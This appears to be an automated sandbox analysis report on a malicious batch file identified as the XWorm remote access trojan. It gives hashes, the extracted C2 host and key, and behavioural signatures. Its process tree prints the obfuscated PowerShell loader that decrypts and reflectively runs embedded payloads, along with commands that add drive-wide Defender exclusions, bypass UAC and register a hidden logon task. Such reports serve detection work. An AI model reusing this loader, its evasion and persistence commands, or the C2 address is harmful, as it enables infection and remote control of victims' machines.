Analysis
-
max time kernel
1799s -
max time network
1793s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
26-05-2024 14:55
Static task
static1
Behavioral task
behavioral1
Sample
FN-INTERNAL.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
FN-INTERNAL.bat
Resource
win7-20240508-en
Behavioral task
behavioral3
Sample
FN-INTERNAL.bat
Resource
win10v2004-20240508-en
General
-
Target
FN-INTERNAL.bat
-
Size
376KB
-
MD5
121a69448e9f5eef0ba4c1229b471208
-
SHA1
90abf42b20fb75a7f922b4a83cbeb77ca5dbf5d0
-
SHA256
b383a0ab3670e505ae0b7a7b6d68c096bb799ce858d8afc2e2ef5d1c1314051a
-
SHA512
c9e903245c3ab434018e23e4c51bf9d4fcbdb9dc1b85114574c12a2ce5c3ec6cd811fa1b51a34c86c695c6ba79cade1cdc215c4953090a342ba4ff6c1a92bc3d
-
SSDEEP
6144:C+g8ai0m+BiS0FY9tRpUOAIeJxsOjzW1JlW5nHa5EV8hpzjHRQbh9xph9aK7PGaj:C+gdOSOYbRHjeJxbOJlW5niJSdT9amGk
Malware Config
Extracted
xworm
5.0
software-led.gl.at.ply.gg:38954
m6tgeOEIIMDuaFcQ
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2764-213-0x00000252698A0000-0x00000252698AE000-memory.dmp family_xworm -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 2764 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 2764 powershell.exe 3108 powershell.exe 3056 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
ComputerDefaults.exepid process 3580 ComputerDefaults.exe -
Drops file in System32 directory 10 IoCs
Processes:
svchost.exesvchost.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe -
Modifies data under HKEY_USERS 3 IoCs
Processes:
svchost.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 3056 powershell.exe 3056 powershell.exe 3056 powershell.exe 2924 powershell.exe 2924 powershell.exe 2924 powershell.exe 3108 powershell.exe 3108 powershell.exe 3108 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
powershell.exepid process 2764 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2764 powershell.exe Token: SeDebugPrivilege 3056 powershell.exe Token: SeIncreaseQuotaPrivilege 3056 powershell.exe Token: SeSecurityPrivilege 3056 powershell.exe Token: SeTakeOwnershipPrivilege 3056 powershell.exe Token: SeLoadDriverPrivilege 3056 powershell.exe Token: SeSystemProfilePrivilege 3056 powershell.exe Token: SeSystemtimePrivilege 3056 powershell.exe Token: SeProfSingleProcessPrivilege 3056 powershell.exe Token: SeIncBasePriorityPrivilege 3056 powershell.exe Token: SeCreatePagefilePrivilege 3056 powershell.exe Token: SeBackupPrivilege 3056 powershell.exe Token: SeRestorePrivilege 3056 powershell.exe Token: SeShutdownPrivilege 3056 powershell.exe Token: SeDebugPrivilege 3056 powershell.exe Token: SeSystemEnvironmentPrivilege 3056 powershell.exe Token: SeRemoteShutdownPrivilege 3056 powershell.exe Token: SeUndockPrivilege 3056 powershell.exe Token: SeManageVolumePrivilege 3056 powershell.exe Token: 33 3056 powershell.exe Token: 34 3056 powershell.exe Token: 35 3056 powershell.exe Token: 36 3056 powershell.exe Token: SeDebugPrivilege 2924 powershell.exe Token: SeIncreaseQuotaPrivilege 2924 powershell.exe Token: SeSecurityPrivilege 2924 powershell.exe Token: SeTakeOwnershipPrivilege 2924 powershell.exe Token: SeLoadDriverPrivilege 2924 powershell.exe Token: SeSystemProfilePrivilege 2924 powershell.exe Token: SeSystemtimePrivilege 2924 powershell.exe Token: SeProfSingleProcessPrivilege 2924 powershell.exe Token: SeIncBasePriorityPrivilege 2924 powershell.exe Token: SeCreatePagefilePrivilege 2924 powershell.exe Token: SeBackupPrivilege 2924 powershell.exe Token: SeRestorePrivilege 2924 powershell.exe Token: SeShutdownPrivilege 2924 powershell.exe Token: SeDebugPrivilege 2924 powershell.exe Token: SeSystemEnvironmentPrivilege 2924 powershell.exe Token: SeRemoteShutdownPrivilege 2924 powershell.exe Token: SeUndockPrivilege 2924 powershell.exe Token: SeManageVolumePrivilege 2924 powershell.exe Token: 33 2924 powershell.exe Token: 34 2924 powershell.exe Token: 35 2924 powershell.exe Token: 36 2924 powershell.exe Token: SeDebugPrivilege 3108 powershell.exe Token: SeIncreaseQuotaPrivilege 3108 powershell.exe Token: SeSecurityPrivilege 3108 powershell.exe Token: SeTakeOwnershipPrivilege 3108 powershell.exe Token: SeLoadDriverPrivilege 3108 powershell.exe Token: SeSystemProfilePrivilege 3108 powershell.exe Token: SeSystemtimePrivilege 3108 powershell.exe Token: SeProfSingleProcessPrivilege 3108 powershell.exe Token: SeIncBasePriorityPrivilege 3108 powershell.exe Token: SeCreatePagefilePrivilege 3108 powershell.exe Token: SeBackupPrivilege 3108 powershell.exe Token: SeRestorePrivilege 3108 powershell.exe Token: SeShutdownPrivilege 3108 powershell.exe Token: SeDebugPrivilege 3108 powershell.exe Token: SeSystemEnvironmentPrivilege 3108 powershell.exe Token: SeRemoteShutdownPrivilege 3108 powershell.exe Token: SeUndockPrivilege 3108 powershell.exe Token: SeManageVolumePrivilege 3108 powershell.exe Token: 33 3108 powershell.exe -
Suspicious use of WriteProcessMemory 62 IoCs
Processes:
cmd.exepowershell.execmd.exedescription pid process target process PID 2084 wrote to memory of 64 2084 cmd.exe cmd.exe PID 2084 wrote to memory of 64 2084 cmd.exe cmd.exe PID 2084 wrote to memory of 2900 2084 cmd.exe cmd.exe PID 2084 wrote to memory of 2900 2084 cmd.exe cmd.exe PID 2084 wrote to memory of 2764 2084 cmd.exe powershell.exe PID 2084 wrote to memory of 2764 2084 cmd.exe powershell.exe PID 2764 wrote to memory of 3056 2764 powershell.exe powershell.exe PID 2764 wrote to memory of 3056 2764 powershell.exe powershell.exe PID 2764 wrote to memory of 516 2764 powershell.exe cmd.exe PID 2764 wrote to memory of 516 2764 powershell.exe cmd.exe PID 516 wrote to memory of 3580 516 cmd.exe ComputerDefaults.exe PID 516 wrote to memory of 3580 516 cmd.exe ComputerDefaults.exe PID 2764 wrote to memory of 4076 2764 powershell.exe cmd.exe PID 2764 wrote to memory of 4076 2764 powershell.exe cmd.exe PID 2764 wrote to memory of 2924 2764 powershell.exe powershell.exe PID 2764 wrote to memory of 2924 2764 powershell.exe powershell.exe PID 2764 wrote to memory of 3108 2764 powershell.exe powershell.exe PID 2764 wrote to memory of 3108 2764 powershell.exe powershell.exe PID 2764 wrote to memory of 3396 2764 powershell.exe Explorer.EXE PID 2764 wrote to memory of 2160 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 3144 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 4916 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 1168 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 1560 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 372 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 1940 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 1740 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 2320 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 1328 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 732 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 1320 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 2696 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 2300 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 1308 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 1552 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 3276 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 908 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 2680 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 716 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 4644 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 1880 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 1668 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 1088 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 1480 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 1076 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 2056 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 1068 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 864 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 2420 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 1036 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 2600 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 4764 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 1808 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 820 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 2608 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 2392 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 1208 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 1600 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 1792 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 408 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 2308 2764 powershell.exe svchost.exe PID 2764 wrote to memory of 1384 2764 powershell.exe svchost.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵PID:732
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch1⤵PID:820
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k rpcss1⤵PID:864
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵PID:908
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:372
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Modifies data under HKEY_USERS
PID:408
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵PID:716
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵PID:1036
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵PID:1068
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork1⤵PID:1076
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
- Drops file in System32 directory
PID:1088
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵PID:1168
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1208
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵PID:1308
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1320
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵PID:1328
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1384
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1480
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵PID:1552
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵PID:1560
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵PID:1600
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1668
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵PID:1740
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1792
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1808
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵PID:1880
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1940
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵PID:2056
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2160
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2300
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵PID:2308
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2320
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
- Drops file in System32 directory
PID:2392
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵PID:2420
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵PID:2600
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2608
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2696
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵PID:3144
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵PID:3276
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3396
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FN-INTERNAL.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\system32\cmd.execmd /c "set __=^&rem"3⤵PID:64
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('97S5HKOOEHVTK1tx3yu5lTndq7VoLhaiBMi1fQ7XC/w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BY/5WS5SKbagLrml3T2b0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ERsLU=New-Object System.IO.MemoryStream(,$param_var); $BcZuZ=New-Object System.IO.MemoryStream; $aYIjw=New-Object System.IO.Compression.GZipStream($ERsLU, [IO.Compression.CompressionMode]::Decompress); $aYIjw.CopyTo($BcZuZ); $aYIjw.Dispose(); $ERsLU.Dispose(); $BcZuZ.Dispose(); $BcZuZ.ToArray();}function execute_function($param_var,$param2_var){ $WzoGX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uXAck=$WzoGX.EntryPoint; $uXAck.Invoke($null, $param2_var);}$FVRVU = 'C:\Users\Admin\AppData\Local\Temp\FN-INTERNAL.bat';$host.UI.RawUI.WindowTitle = $FVRVU;$gLqRi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($FVRVU).Split([Environment]::NewLine);foreach ($pQPCS in $gLqRi) { if ($pQPCS.StartsWith('VPEeCHQfOWHyYXzmlFZZ')) { $YmBxU=$pQPCS.Substring(20); break; }}$payloads_var=[string[]]$YmBxU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:2900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3056
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:516 -
C:\Windows \System32\ComputerDefaults.exe"C:\Windows \System32\ComputerDefaults.exe"5⤵
- Executes dropped EXE
PID:3580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q4⤵PID:4076
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\FN-INTERNAL')4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3108
-
-
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵PID:4764
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:4916
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4644
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵PID:2680
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
Filesize
50KB
MD52143b379fed61ab5450bab1a751798ce
SHA132f5b4e8d1387688ee5dec6b3cc6fd27b454f19e
SHA256a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81
SHA5120bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa
-
Filesize
1KB
MD537dd47dad31b9c666f0f4df0beeddfa2
SHA1a117eb3f670dff0656a96b15ba5f872f3da17591
SHA25661bf769b256336c493ece34f176e0edcc1e47cde2d9e39a41f9ad69f80c9d83b
SHA512120986ffd44f23531f3bb7de62c18e40f8b2cb12c8a470edb5b03e44f68dccdf04bbe2faf56759977f357334c48ae431dbcddf845e9005ba2a805383e8c8c118
-
Filesize
1KB
MD52f2d37af23e9151207deae9d60891ea6
SHA180515bef4c534014e11d2e902eec8d1b61c92942
SHA256100bdf7c9bf30f3a27fb56df9b6b7e509bcabc91137f4a0fc6907df494d2478e
SHA512e026c03c4bc4f35be469c197b2bab87945cce9dfb5a902727c9e533eb49e6c2179109eca6b813e0a4943173bd932403ecbdfc48ce5aec98cbfa027a59062fc3e
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
72KB
MD556d03e4218082266a9cdd8600537d891
SHA1c153719f971dcee8f6985d7c79f64fc88dd8663c
SHA256210d5714497505022aa068167f7ed5bb826abcf53cfe741c9860a2c8dce3f54a
SHA512f2c64a4dbab789635bf97b3d615fcc96dfe8c4094b67a464eb34bc84501eb7648e7fa692971e917c1ebfac0548187721ecc552aaad35767f8a40846d922613d3